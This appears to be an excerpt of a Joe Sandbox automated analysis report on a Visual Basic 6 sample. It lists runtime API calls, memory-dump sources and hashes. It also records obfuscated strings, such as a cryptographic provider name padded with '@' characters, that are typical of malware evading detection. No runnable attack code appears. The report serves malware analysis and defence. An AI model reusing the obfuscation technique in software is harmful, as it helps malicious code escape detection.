                                                                    • __vbaStrMove.MSVBVM60(?,Info zu ), ref: 0054F718
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057E3B8,0040BB84,00000054), ref: 0054F741
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0054F75F
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00401006), ref: 0054F76A
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,00401006), ref: 0054F782
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,00000000,?,?,00401006), ref: 0054F7A0
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F7ED
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,000000B8), ref: 0054F834
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0054F85B
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F8A8
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,000000C0), ref: 0054F8EF
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0054F916
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F963
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,000000C8), ref: 0054F9AA
                                                                    • __vbaStrI2.MSVBVM60(?,Version ), ref: 0054F9C6
                                                                    • __vbaStrMove.MSVBVM60(?,Version ), ref: 0054F9D0
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,Version ), ref: 0054F9D6
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,Version ), ref: 0054F9E0
                                                                    • __vbaStrCat.MSVBVM60(0040BD54,00000000,00000000,?,Version ), ref: 0054F9EB
                                                                    • __vbaStrMove.MSVBVM60(0040BD54,00000000,00000000,?,Version ), ref: 0054F9F5
                                                                    • __vbaStrI2.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054F9FE
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA08
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA0E
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA18
                                                                    • __vbaStrCat.MSVBVM60(0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA23
                                                                    • __vbaStrMove.MSVBVM60(0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA2D
                                                                    • __vbaStrI2.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA36
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA40
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA46
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA50
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BB18,00000054), ref: 0054FA8B
                                                                    • __vbaFreeStrList.MSVBVM60(00000008,?,00000000,?,?,?,?,?,?), ref: 0054FAC1
                                                                    • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0054FADB
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0054FAF6
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,00000000), ref: 0054FB11
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B18C,00000014), ref: 0054FB5E
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000060), ref: 0054FB9F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BB18,00000054), ref: 0054FBD9
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0040BB18,00000054), ref: 0054FBF0
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0054FBFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckHresult$Move$Free$New2$List$Chkstk
                                                                    • String ID: Info zu $Version
                                                                    • API String ID: 2866532796-1133326459
                                                                    • Opcode ID: c56cc79b7d290f24b6fe01613f70d92bf3193ddc098c51638a488e2d4b1df85b
                                                                    • Instruction ID: ecaebf5ccedca865251d21b8f58959b9c2353d88645e05ae6b1eb67f6fc6ecc4
                                                                    • Opcode Fuzzy Hash: c56cc79b7d290f24b6fe01613f70d92bf3193ddc098c51638a488e2d4b1df85b
                                                                    • Instruction Fuzzy Hash: 8912D171D00218AFDB11EFA4CD49BDDBBB5FB09308F1040BAE109BB2A1DB745A899F54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054FFBD
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 0054FFF5
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 0055000B
                                                                    • __vbaStrToUnicode.MSVBVM60(00401006,00000000,?,00000000,?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 00550016
                                                                    • __vbaFreeStr.MSVBVM60(00401006,00000000,?,00000000,?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 00550027
                                                                    • #606.MSVBVM60(00000400,00000002), ref: 0055004B
                                                                    • __vbaStrMove.MSVBVM60(00000400,00000002), ref: 00550055
                                                                    • __vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0055005D
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00401006,00000400,00000400,00000002), ref: 00550074
                                                                    • __vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 00550089
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 0055009D
                                                                    • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 005500A8
                                                                    • __vbaStrToUnicode.MSVBVM60(00401006,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 005500B4
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,00000000,?,00401006,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401006), ref: 005500CC
                                                                    • __vbaStrCopy.MSVBVM60(00401006,00000000,?,00000000,?,00401006,00000000,0002003F,?), ref: 005503A5
                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 005503BD
                                                                    • __vbaFreeStr.MSVBVM60(0055040F,?), ref: 00550409
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
                                                                    • String ID:
                                                                    • API String ID: 3225542645-0
                                                                    • Opcode ID: 2e1c68303d20cffcf3bd6badc874e882de27ebe087d2c03317a309ad2b0cb937
                                                                    • Instruction ID: 2ada3089675384b0bd3349cd9b303af50a9434b8a840638a57aaac04ce41d377
                                                                    • Opcode Fuzzy Hash: 2e1c68303d20cffcf3bd6badc874e882de27ebe087d2c03317a309ad2b0cb937
                                                                    • Instruction Fuzzy Hash: AAC1B671D00219ABDF15EFE1C845BDEBBB8BF08304F00856AF615B61A1DB389A498F64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005507BA
                                                                    • __vbaStrCat.MSVBVM60(@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 005507EE
                                                                    • __vbaStrMove.MSVBVM60(@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 005507F8
                                                                    • __vbaStrCat.MSVBVM60(@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550803
                                                                    • __vbaStrMove.MSVBVM60(@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055080D
                                                                    • __vbaStrCat.MSVBVM60(@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550818
                                                                    • __vbaStrMove.MSVBVM60(@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550822
                                                                    • __vbaStrCat.MSVBVM60(A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055082D
                                                                    • __vbaStrMove.MSVBVM60(A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550837
                                                                    • __vbaStrCat.MSVBVM60(@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550842
                                                                    • __vbaStrMove.MSVBVM60(@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055084C
                                                                    • __vbaStrCat.MSVBVM60(@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550857
                                                                    • __vbaStrMove.MSVBVM60(@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550861
                                                                    • __vbaStrCat.MSVBVM60(p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 0055086C
                                                                    • __vbaStrMove.MSVBVM60(p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550876
                                                                    • __vbaStrCat.MSVBVM60(p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550881
                                                                    • __vbaStrMove.MSVBVM60(p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 0055088B
                                                                    • __vbaStrCat.MSVBVM60(@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000), ref: 00550896
                                                                    • __vbaStrMove.MSVBVM60(@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000), ref: 005508A0
                                                                    • __vbaStrCat.MSVBVM60(@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000), ref: 005508AB
                                                                    • __vbaChkstk.MSVBVM60(@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@), ref: 005508BD
                                                                      • Part of subcall function 0054ED1F: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                      • Part of subcall function 0054ED1F: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                      • Part of subcall function 0054ED1F: #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                      • Part of subcall function 0054ED1F: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                      • Part of subcall function 0054ED1F: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                      • Part of subcall function 0054ED1F: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                      • Part of subcall function 0054ED1F: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    • __vbaStrVarMove.MSVBVM60(00000000,00000000,@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@), ref: 005508D8
                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@), ref: 005508E2
                                                                    • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,@e@r@,00000000,@o@v@i@d,00000000), ref: 0055090D
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055091F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$Free$ChkstkList$#632#653
                                                                    • String ID: @C@r@y@$@c@e@d@ @R@S@$@d@ @A@E@S@ $@e@r@$@o@s@o@f$@o@v@i@d$@t@ @E@n@h@a@n$A@ @a@n$M@i@c@r$p@h@i@c@ @P@r$p@t@o@g@r@a@
                                                                    • API String ID: 4029463932-3817434718
                                                                    • Opcode ID: f85e741670bcbdae58ddae0e2b0ede12f76e9b56b4d313766f269775b0bda14b
                                                                    • Instruction ID: 512724ff3bfff438a015331929f5d5da0428f291cc1f9a4c71168ae0a8b3c9e1
                                                                    • Opcode Fuzzy Hash: f85e741670bcbdae58ddae0e2b0ede12f76e9b56b4d313766f269775b0bda14b
                                                                    • Instruction Fuzzy Hash: C4411072E00109BADB05EBA5CC46EDF777DAF08704F20403FB611BA1E1EE78990597A8
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054FC98
                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,00401006), ref: 0054FCC5
                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401006), ref: 0054FCD2
                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401006), ref: 0054FCDF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BBB4,000006FC), ref: 0054FD38
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000001), ref: 0054FD64
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00401006), ref: 0054FD84
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00401006), ref: 0054FD91
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BBB4,000006FC), ref: 0054FDEA
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0054FE16
                                                                    • __vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,?,?,?,?,?,00401006), ref: 0054FE31
                                                                    • #645.MSVBVM60(00000008,00000000), ref: 0054FE46
                                                                    • __vbaStrMove.MSVBVM60(00000008,00000000), ref: 0054FE50
                                                                    • __vbaStrCmp.MSVBVM60(0040A6F0,00000000,00000008,00000000), ref: 0054FE5B
                                                                    • __vbaFreeStr.MSVBVM60(0040A6F0,00000000,00000008,00000000), ref: 0054FE72
                                                                    • __vbaFreeVar.MSVBVM60(0040A6F0,00000000,00000008,00000000), ref: 0054FE7A
                                                                    • __vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,0040A6F0,00000000,00000008,00000000), ref: 0054FE92
                                                                    • __vbaStrMove.MSVBVM60(\MSINFO32.EXE,?,0040A6F0,00000000,00000008,00000000), ref: 0054FE9C
                                                                    • #600.MSVBVM60(00004008,00000001,?,?,?,?,?,?,?,?,?,?,\MSINFO32.EXE,?,0040A6F0,00000000), ref: 0054FEBC
                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0040A6F0,00000000,00000008,00000000), ref: 0054FF07
                                                                    • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0054FF1E
                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0054FF35
                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401006), ref: 0054FF3D
                                                                    • __vbaFreeStr.MSVBVM60(0054FF80,?,?,?,?,?,?,?,?,?,?,00401006), ref: 0054FF7A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$Copy$List$CheckHresultMove$#595#600#645ChkstkErrorExitProc
                                                                    • String ID: MSINFO$PATH$SOFTWARE\Microsoft\Shared Tools Location$SOFTWARE\Microsoft\Shared Tools\MSINFO$Systeminformation are not available!$\MSINFO32.EXE
                                                                    • API String ID: 2627723877-2418805842
                                                                    • Opcode ID: 1836a5e0a6c2dcda1e6fb901f1c4d659edab01701d04af508f269596516418f9
                                                                    • Instruction ID: 9105db11c909bb6ab767f2bbce323313ce2cb04e156976dc94bc5da8be886b51
                                                                    • Opcode Fuzzy Hash: 1836a5e0a6c2dcda1e6fb901f1c4d659edab01701d04af508f269596516418f9
                                                                    • Instruction Fuzzy Hash: D2810771D0020DAADB10EF95C841BEEBBB8FF08304F1081BAE615BB1A1DB759A45CF65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005509C5
                                                                    • __vbaStrCat.MSVBVM60(0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 005509F9
                                                                    • __vbaStrMove.MSVBVM60(0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A03
                                                                    • __vbaStrCat.MSVBVM60(0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A0E
                                                                    • __vbaStrMove.MSVBVM60(0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A18
                                                                    • __vbaStrCat.MSVBVM60(0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A23
                                                                    • __vbaStrMove.MSVBVM60(0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A2D
                                                                    • __vbaStrCat.MSVBVM60(0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A38
                                                                    • __vbaStrMove.MSVBVM60(0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A42
                                                                    • __vbaStrCat.MSVBVM60(0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A4D
                                                                    • __vbaStrMove.MSVBVM60(0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A57
                                                                    • __vbaStrCat.MSVBVM60(0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A62
                                                                    • __vbaStrMove.MSVBVM60(0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A6C
                                                                    • __vbaStrCat.MSVBVM60(0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A77
                                                                    • __vbaStrMove.MSVBVM60(0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A81
                                                                    • __vbaStrCat.MSVBVM60(0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A8C
                                                                    • __vbaStrMove.MSVBVM60(0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C), ref: 00550A96
                                                                    • __vbaStrCat.MSVBVM60(0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000), ref: 00550AA1
                                                                    • __vbaStrMove.MSVBVM60(0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000), ref: 00550AAB
                                                                    • __vbaStrCat.MSVBVM60(0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8,00000000,0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000), ref: 00550AB6
                                                                    • __vbaChkstk.MSVBVM60(0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8), ref: 00550AC8
                                                                      • Part of subcall function 0054ED1F: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                      • Part of subcall function 0054ED1F: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                      • Part of subcall function 0054ED1F: #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                      • Part of subcall function 0054ED1F: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                      • Part of subcall function 0054ED1F: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                      • Part of subcall function 0054ED1F: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                      • Part of subcall function 0054ED1F: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    • __vbaStrVarMove.MSVBVM60(00000000,00000000,0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8), ref: 00550AE3
                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,0040B45C,00000000,0040B444,00000000,0040B420,00000000,0040B3F4,00000000,0040B3D8), ref: 00550AED
                                                                    • __vbaFreeStrList.MSVBVM60(00000009,?,?,0040AF3C,0040AF4C,00000000,0040ACD0,00000000,0040AE60,00000000,00000000,00000000,0040B45C,00000000,0040B444,00000000), ref: 00550B18
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550B2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
